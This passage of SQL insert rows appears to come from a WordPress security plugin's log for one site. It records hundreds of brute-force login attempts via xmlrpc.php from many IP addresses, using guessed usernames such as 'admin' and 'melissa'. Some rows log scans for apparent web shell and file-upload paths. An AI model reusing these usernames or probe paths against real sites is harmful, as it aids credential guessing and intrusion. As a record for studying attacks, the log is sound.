lrpc.php',0,0,0),('39.97.98.38',660693542,'melissa',0,1679353199.5711,152,'VBhzUuODJ5LZMxPgmGYpl9tb','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('39.97.98.38',660693542,'melissa',0,1679353200.2695,152,'PkiBRzN2dFOVhY1gD5GMwxmp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('39.97.98.38',660693542,'',0,1679353200.2717,10,'PkiBRzN2dFOVhY1gD5GMwxmp','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('151.80.88.201',2538625225,'melissa',0,1679353204.6783,152,'xqfibK6pzh5m1IJLvUesrDu0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('161.97.88.2',2707511298,'melissa',0,1679353206.8020,152,'aP1yJvUorR5KSMYF0qG4QcDA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.223.120.189',1390377149,'melissa',0,1679353212.0132,152,'kt4drceXJCZIMOhW3a7Rfvi0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.239.206.128',1542442624,'melissa',0,1679353230.8588,152,'K34XcuxqQHEWps0lwYkM8BTA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('64.227.108.223',1088646367,'melissa',0,1679353236.6644,152,'x7M51FYtOPEy0I36oRDeH8cw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.91.211.210',861656018,'melissa',0,1679357414.3503,152,'C3fukPlZjJ02DmLnzFa4QpTt','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.119.63',3098048319,'melissa',0,1679357414.3510,152,'cYF3gGo8wEjqdBNZHsRyDUhP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.148.65.134',3482599814,'melissa',0,1679357416.9240,152,'Qua2c47SAWfKHmCBX1wE6TbU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'melissa',0,1679357426.0332,152,'gjO2XkyJmBev05hRT6wiuzrS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('206.189.139.178',3468528562,'melissa',0,1679357436.1846,152,'hR0GcUPK1NlJX9ZzQ4VDHavd','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.91.211.210',861656018,'melissa',0,1679357443.9943,152,'J1PCOVdfSUpKMYliyvWaQhE7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.91.211.210',861656018,'',0,1679357443.9964,10,'J1PCOVdfSUpKMYliyvWaQhE7','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('162.253.54.78',2734503502,'melissa',0,1679357465.1785,152,'Tm1XyZI6kexpPrJHz3nu9YFD','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.46.105.156',1496213916,'melissa',0,1679357481.0259,152,'ml3Bz28MDSHbWGir0eqFpcLx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('65.21.78.116',1091915380,'melissa',0,1679357487.0046,152,'zDOyFmVHTga3dY7G1N2APnI0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('93.188.2.5',1572602373,'melissa',0,1679357570.8118,152,'kEfdQUqrPG05NDzmIgo9l1aV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.39.222.194',908582594,'melissa',0,1679368201.6208,152,'FMDcvalmbC98EjzKpohPuqtw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.101.66',3098043714,'melissa',0,1679368204.5208,152,'FkYTnCONJmfyHp1S2B9v8XVc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('20.112.210.115',342938227,'melissa',0,1679368214.5863,152,'zqjW1tM0mvc7SPOUpgIuobFh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.87.42.85',760687189,'melissa',0,1679368235.2685,152,'5AuUdGcbw0LSiC4hOPytpxro','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.179.190.218',1739833050,'melissa',0,1679368247.0105,152,'aFPJAbpMlBQyc24ehtz5dVgS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.234.174',2672159406,'melissa',0,1679369979.8266,152,'5rqvDtoymU1IWYJxQT283Xe9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('202.254.236.120',3405704312,'melissa',0,1679369980.5825,152,'MlDhjE1KqgyVaJGLeTQX4tpR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.210.156.16',869440528,'melissa',0,1679369984.9009,152,'sl6cIRhP4K9na7b5YDJMuHWz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.210.156.16',869440528,'melissa',0,1679369996.5643,152,'lgv09ULRwxZmfqTrJ8DSAWPM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.210.156.16',869440528,'',0,1679369996.5674,10,'lgv09ULRwxZmfqTrJ8DSAWPM','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('78.47.198.54',1311753782,'melissa',0,1679370002.8592,152,'avTfp7HOeNgmbzKBFUEXiCD6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.182.56.240',3115727088,'melissa',0,1679370004.8097,152,'X1jEtR8TyAIhKF4nHmsdYfSv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('156.230.169.138',2632362378,'melissa',0,1679370011.9859,152,'nJYp8XqoZCW7TwNLERufyekD','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.210.156.16',869440528,'',0,1679370012.1988,71,'71rin9fOqpP3dkDaxoNMwmZB','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('151.80.88.201',2538625225,'melissa',0,1679370019.7744,152,'ZzaojNqrI5dV1E8pHYhwmn4e','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'melissa',0,1679370020.4190,152,'qWUtdAeTEVCnQLXsc12ZMOmj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'',0,1679370020.4206,10,'qWUtdAeTEVCnQLXsc12ZMOmj','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('194.233.91.198',3270073286,'melissa',0,1679370021.6516,152,'woQXifAVY4rbdhPO8GCnx7B3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('87.248.153.52',1475909940,'melissa',0,1679378242.0169,152,'KpkAxi7BXlayOJGoNRQ62hdm','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('87.248.153.52',1475909940,'melissa',0,1679378243.8421,152,'2QSbvulKf1rFjokIZJ9xHhUB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('87.248.153.52',1475909940,'',0,1679378243.8457,10,'2QSbvulKf1rFjokIZJ9xHhUB','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('162.0.232.58',2717968442,'melissa',0,1679378244.6074,152,'CuTjVhQfXZonNHBMmDRSeJUb','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('20.112.210.115',342938227,'melissa',0,1679378257.8524,152,'R3lSUva0hyX4pJVoesZPMktc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('143.125.250.2',2407397890,'melissa',0,1679378258.2540,152,'8nqYpWOxD1yhXKrzBMsfclCP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('135.181.136.149',2276821141,'melissa',0,1679378262.9100,152,'aiF3AmBLPgzZkuNW10DOUHfn','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.148.65.134',3482599814,'melissa',0,1679378268.2724,152,'bYfGZKl18y7UuH3Jv4pgq0PR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('167.114.98.248',2809291512,'melissa',0,1679378282.0340,152,'pjFtd56bGEuB8OshARUHMKco','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.159.84.10',1738494986,'melissa',0,1679378285.3752,152,'lsdzYLrZ9I6qSCvu0aFVcGBQ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.132.43.137',3112446857,'melissa',0,1679382498.8976,152,'ZrsvKxzF3NMjXVIlHJQ42qn8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('15.235.15.195',267063235,'melissa',0,1679382498.8973,152,'92JlbXBqF6y3dTpSOtLQ1A0Z','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.232.31',2487805983,'melissa',0,1679382503.5711,152,'lmLZqA9R4cfzFsIeTNQXh8aS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.204.46.244',1540108020,'melissa',0,1679382503.8884,152,'fBbRFaJGKg7lNEQqLkjMe0dv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('23.88.103.105',391669609,'melissa',0,1679382512.5663,152,'FzPLMKH3nrCAke1lB5Ow8XEo','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.91.211.210',861656018,'melissa',0,1679382525.5050,152,'8uKtQlREoSe1GMH6gr9iadIO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.234.174',2672159406,'melissa',0,1679382526.2227,152,'MRc3I2PmlFSV4XZKU69GHrxy','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('43.129.198.177',729925297,'melissa',0,1679382534.1740,152,'Ry5oCA9hPlerMTaIWzN8Yug1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('141.94.87.67',2371770179,'melissa',0,1679382535.0548,152,'Y7WOKp1Ua4yJklBEGth3jASc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.239.206.128',1542442624,'melissa',0,1679382535.0564,152,'gpDeZ5uAjaEK89zYoM0UHydB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.68.11.215',860097495,'melissa',0,1679382543.8432,152,'KvXjqsNVoGQazUTEuJ1hSHLi','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.234.174',2672159406,'melissa',0,1679391188.3506,152,'LO4Mhv82iYJFoTzqtQnHVlPB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.101.66',3098043714,'melissa',0,1679391189.7086,152,'H9tjfITEmyogpw58WzAdLlRD','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.46.105.156',1496213916,'melissa',0,1679391199.5391,152,'A3HkUxRtL1cQb28ZOo7shETv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'melissa',0,1679391211.5710,152,'6WN708ucxRrLVHOjmzldDMpa','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.239.206.128',1542442624,'melissa',0,1679391218.6098,152,'IJEOu9VYoltsLSvHjr8yGwfA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('119.59.96.60',2000379964,'melissa',0,1679391221.3642,152,'ftTZsYhQ2gSv1bx9l3AOzLkW','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.232.31',2487805983,'melissa',0,1679391222.1292,152,'hnYG5uZVP1JmcbkwWO3CIjRa','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'melissa',0,1679391225.4166,152,'8AS0MUKFGNhevpOurYdZiTLX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'',0,1679391225.4207,10,'8AS0MUKFGNhevpOurYdZiTLX','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('43.129.198.177',729925297,'melissa',0,1679391230.6615,152,'DPjT4cUi7gBNWn9HmVwAb63d','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('65.21.78.116',1091915380,'melissa',0,1679395646.9615,152,'32UKZwlY6aC8ygGoiNzjLVHv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.101.66',3098043714,'melissa',0,1679395647.1304,152,'325lVZYqwKeOuaJGWX0fbNjU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('83.240.223.99',1408294755,'melissa',0,1679395649.5052,152,'ieEvW3PY5HXxdjTS2rgyAhQz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('160.153.146.149',2694419093,'melissa',0,1679395653.0407,152,'Y2Ld5IClU1oNRmhwDMZqWr3P','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.204.46.244',1540108020,'melissa',0,1679395653.1391,152,'HJTndaz8vQlmDEZoANOGre7S','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('123.30.238.182',2065624758,'melissa',0,1679395663.2711,152,'NtsHW96pvrCzR0SfZ7EB2Vid','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.234.174',2672159406,'melissa',0,1679395663.3625,152,'K1u47pbrRyhHZEsMG2CVcmJg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.239.206.128',1542442624,'melissa',0,1679395668.5703,152,'O0YlyRL8g3WcKaxzhqwrT2po','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.239.206.128',1542442624,'melissa',0,1679395672.5627,152,'tI8dsCxz7YM0go9rWPhkjAXL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.239.206.128',1542442624,'',0,1679395672.5651,10,'tI8dsCxz7YM0go9rWPhkjAXL','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('159.69.234.174',2672159406,'melissa',0,1679395691.5425,152,'hWamUpb8Z7GxSjflz6DstIFk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.234.174',2672159406,'',0,1679395691.5466,10,'hWamUpb8Z7GxSjflz6DstIFk','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('184.168.98.17',3098042897,'Admin',0,1679404524.6302,152,'Krw7BzMvtnHh6DGSYJxjCeqg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('88.99.191.164',1482932132,'admin',0,1679404535.7033,152,'b2t6ZQa7exv8JfYcPmDAzN5i','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.148.65.134',3482599814,'Admin',0,1679404540.7708,152,'9zb2MmtkVP7EKafps8B5QOLx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.101.66',3098043714,'admin',0,1679404540.9257,152,'7NnO8qp2udmgWizSPo9xVXye','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.234.174',2672159406,'admin',0,1679404547.5721,152,'gvpt6BzrJidmVsOSGI5MDfyQ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'admin',0,1679404556.1435,152,'juifbLmI4ythoq26TnFOUwlX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('43.135.100.126',730293374,'Admin',0,1679404557.0462,152,'ipr7IS9TXA5d1ynK6uZBev8h','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'username',0,1679404590.8916,152,'cHYbF2UhgCn3lyVL6tB4ADxP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'',0,1679404590.8938,10,'cHYbF2UhgCn3lyVL6tB4ADxP','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('91.239.206.128',1542442624,'admin',0,1679408818.3850,152,'uRo5GB8q9X1yxnl7D0PAth6S','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'admin',0,1679408831.1596,152,'lrcsn4f6hCqWiQpOKeIDGAZy','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.224.133',1152573573,'Admin',0,1679408832.2674,152,'4VOG1JejBWAfUMnkuxgEQbo0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('65.21.78.116',1091915380,'admin',0,1679408838.2432,152,'Z0IH58tc4gukwFd3MzNAqCpJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.91.211.210',861656018,'Admin',0,1679408867.4686,152,'zegEW4MHQRmjLNS21PD3rBbp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('20.84.104.76',341076044,'admini',0,1679408868.3865,152,'OKLafkUE7osCv0bc8wjVFH5t','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.234.174',2672159406,'test',0,1679408874.6397,152,'903VLkeh81npwGuItMcrOZKf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('167.114.98.248',2809291512,'admin',0,1679408876.9889,152,'NRqtorsz2jvxQWIEUul5FXaL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('43.135.100.126',730293374,'Admin',0,1679408885.8032,152,'zwunjTi1bMhUctyleDIA4k5N','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('116.202.36.12',1959404556,'admin',0,1679414801.0645,152,'tnLeFH4KRbCS5o3BuGx7EPdV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.119.63',3098048319,'testuser',0,1679414801.7400,152,'6zBfc9tvMiOg1qKN5oxGWpnZ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('141.94.87.67',2371770179,'Admin',0,1679414804.3663,152,'gWSofM17K0dV3RJyeQGpshCO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('167.114.98.248',2809291512,'bunyawee',0,1679414811.3687,152,'8he9Ob43pTNRlPU2dtJZSCuW','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('119.59.96.60',2000379964,'admin',0,1679414817.7758,152,'pVOZEmAwqkt7hX4lvSGW59B0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'admin',0,1679414819.6586,152,'4zCuVcpNRrEQbnPaFgLOY7Av','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('64.20.33.2',1075060994,'user',0,1679414826.9876,152,'nD0RA42VKvhmupTG1ML3lyNB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.135.152.155',92772507,'',0,1679418851.1151,55,'5k1nw0DjlRc8XfFdNJSmoA2e','','19|0|0|0|cmdev-site1.com/wp-content/plugins/core-stab/index.php',0,19,0),('5.135.152.155',92772507,'',0,1679418908.6494,55,'AcJNTnB0MvVwz96dCq8xSO53','','19|0|0|0|cmdev-site1.com/wp-content/plugins/core-fork/index.php',0,19,0),('5.135.152.155',92772507,'',0,1679418908.6562,10,'AcJNTnB0MvVwz96dCq8xSO53','','707|0|0|0|cmdev-site1.com/wp-content/plugins/core-fork/index.php',0,707,0),('148.251.20.250',2499482874,'Admin',0,1679426274.1902,152,'qbKM9GtPDHj5y3T72Ffx8E1W','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.101.66',3098043714,'Admin',0,1679426274.8542,152,'1yDJAbRuv9WnQaXdkGK04ZSU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.158.145.98',866029922,'test',0,1679426282.5210,152,'KMfU2HCSEb6p7VcFnh3IoGJg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.239.206.128',1542442624,'admin',0,1679426286.1746,152,'IUfs4ntvqAXhEFmQW6Y5aybL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('141.94.87.67',2371770179,'tashi',0,1679426291.4192,152,'nMKcwa82Tmd1GEoi0gqLPrQh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.119.63',3098048319,'admin',0,1679426294.1870,152,'SEq8vdMJukIhFCxtg1aW50oT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('43.129.198.177',729925297,'admin',0,1679426298.7106,152,'F1KSyE3ZXGU9VbxjTowIB5sz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.64.25.22',759175446,'username',0,1679426343.0994,152,'BQ0qoYM7kaiPbUpvX9z48FIR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'phlox',0,1679428244.1301,152,'pKVGxIhXtJk0mCin5fcdNP18','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.147.241.45',1737748781,'admin',0,1679428244.1764,152,'FOCXLwQZqD5AoMdhn6lIzutv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.232.31',2487805983,'artsadd',0,1679428245.3011,152,'K0oBCiENxwbdjf57kOVTz6Q4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('41.72.149.125',692622717,'test',0,1679428252.0566,152,'fj2A17VBmuDPLn0Cdyg49TI5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.113.188.151',1114750103,'admin',0,1679428255.0436,152,'sSGL0aM2YmU47ChWNlFto3KO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('13.75.144.52',223055924,'admin',0,1679428260.5817,152,'teSB4IHh7vUorGK8qFEAywWf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.239.206.128',1542442624,'admin',0,1679428261.5143,152,'YhswEM0frZU1HJ8iaRSgky37','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.225.237.131',1759636867,'admin',0,1679428265.4991,152,'FkH36dBKSNCe7sg4ibP5fDGU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.82.217.117',3578976629,'wordpress',0,1679428271.1910,152,'9FK6RHcZnP8ies0S1A5maYMU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'test',0,1679428272.2660,152,'NIPB0gMRz6Y9VdoWrtAqbySj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'',0,1679428272.2704,10,'NIPB0gMRz6Y9VdoWrtAqbySj','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('91.239.206.128',1542442624,'dermen',0,1679428276.2195,152,'7TlbkEfFrVipYeo1maGyMctN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.239.206.128',1542442624,'',0,1679428276.2214,10,'7TlbkEfFrVipYeo1maGyMctN','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('194.113.235.169',3262245801,'',0,1679431171.0737,55,'fR9Zlcvk7jbtoXmsqrIy8zAE','','19|0|0|0|cmdev-site1.com/wp-acess.php',0,19,0),('194.38.23.196',3257276356,'',0,1679431488.5030,55,'KefqgND39Hl8TXpixbn5rvVk','','19|0|0|0|cmdev-site1.com/admin/jquery-file-upload/server/php/index.php',0,19,0),('150.60.232.16',2520573968,'admin',0,1679434276.4242,152,'1POyIDaY9Lxsh7jzJ08kfpqe','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('43.129.198.177',729925297,'admin',0,1679434276.8863,152,'CPIak6GUxy4qdVei2fMprHQR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('150.60.232.16',2520573968,'admin',0,1679434285.5564,152,'bXfhBmE93F0cIi61VOwgCvRj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('150.60.232.16',2520573968,'',0,1679434285.5584,10,'bXfhBmE93F0cIi61VOwgCvRj','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('162.0.232.58',2717968442,'admin',0,1679434288.9270,152,'oKzh05vJfqDSM2Pj4xYZGVQN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.119.63',3098048319,'admin',0,1679434301.2071,152,'UKjRCfAcYnMPL4z2Ik8iVv7E','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.148.65.134',3482599814,'admin',0,1679434304.8834,152,'PXU3iDgpktsqjMCf4QRKc6BV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.234.174',2672159406,'Admin',0,1679434307.1339,152,'VDWf5CPe8jaobYZNvMJF3kOr','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.234.174',2672159406,'admin',0,1679434313.8403,152,'OG0WR1cUX2QqL5Yhlie7BnDr','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.234.174',2672159406,'',0,1679434313.8457,10,'OG0WR1cUX2QqL5Yhlie7BnDr','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('148.72.232.31',2487805983,'garak',0,1679434318.0695,152,'UrKaYpLZAc3Ci1I2OhfVS9eX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.139.10.72',764086856,'admin',0,1679434319.0250,152,'jUZNlImJyPaSsrcKVbgF3XG7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.239.206.128',1542442624,'admin',0,1679434326.8211,152,'NmfeIBbZJRdq1rPWElY8vKT4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('81.161.229.112',1369564528,'melissa',0,1679438806.4935,152,'WT9bIuZ3SUqsrfK4HClcQhi1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('81.161.229.112',1369564528,'techspt',0,1679438807.5233,152,'HmTMADP1s5wKa3oOuJE4hb2y','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('81.161.229.112',1369564528,'',0,1679438807.5251,10,'HmTMADP1s5wKa3oOuJE4hb2y','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('91.239.206.128',1542442624,'test',0,1679446085.0427,152,'w3r1yqUVBciC9OgmFk0YDpZW','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.91.211.210',861656018,'admin',0,1679446085.9447,152,'6HbIwm7OrdksjZ2JBhgD4NTM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('135.181.136.149',2276821141,'admin',0,1679446086.7119,152,'fOxWQL8VHulhstIB3mTcJP4z','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('39.97.98.38',660693542,'admin',0,1679446094.8361,152,'DQK68jId2g9euXw7BGxpaJtS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('31.31.198.27',522176027,'bayley',0,1679446106.3771,152,'OWU0EjlX1n8aQhZLNRCeJ9D2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'admin',0,1679446107.4856,152,'5mPCwDeKbAcaItygr7JBiuM3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('52.47.42.107',875506283,'degreed',0,1679446108.0040,152,'yO7UGT6HfbXlFIZ8SvPK2NxV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.239.206.128',1542442624,'admin',0,1679446113.8232,152,'5Ggkhnxljr8uiXMqK6cNDvd2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.239.206.128',1542442624,'',0,1679446113.8278,10,'5Ggkhnxljr8uiXMqK6cNDvd2','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('20.112.210.115',342938227,'admin',0,1679446116.7841,152,'LVq5BQEsYmrjbpNPwcdiZ6Af','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.234.174',2672159406,'admina',0,1679446124.3778,152,'nJIvAlBcmYgzuaQVdo10SEj6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.232.31',2487805983,'admin',0,1679448599.8222,152,'XEeRw0dA84pIbZqKNWrP7G2n','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('212.90.121.205',3562699213,'admin',0,1679448599.9779,152,'Je3w4QsqlxKI8gASCb10ZHtF','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('135.181.136.149',2276821141,'Admin',0,1679448605.1524,152,'URAc7mJHLVMXZ1ns4T02gqhY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.91.211.210',861656018,'Admin',0,1679448609.4773,152,'hqOPMI9rAxDibVlp2oLGK7gR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.182.57.9',3115727113,'admin',0,1679448609.6072,152,'bFHhWgLP0odARr6kB4lTECQy','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('15.235.15.195',267063235,'admin',0,1679448615.7842,152,'Y72NBlXSRO98a03u1UyEc5Fo','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.91.211.210',861656018,'admin1',0,1679448622.7540,152,'yi09lDBL23JUrnYGwbmtaudz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.91.211.210',861656018,'',0,1679448622.7582,10,'yi09lDBL23JUrnYGwbmtaudz','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('151.80.88.201',2538625225,'admin',0,1679448622.9468,152,'z0fhQPuqCEvrNsRMSlnGAt2w','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'wpupdateuser',0,1679448627.0838,152,'MrvaQuZAkVT0xye7Ojs1tSmU','','0|0|0|0|cmdev-site1.com/xmlrp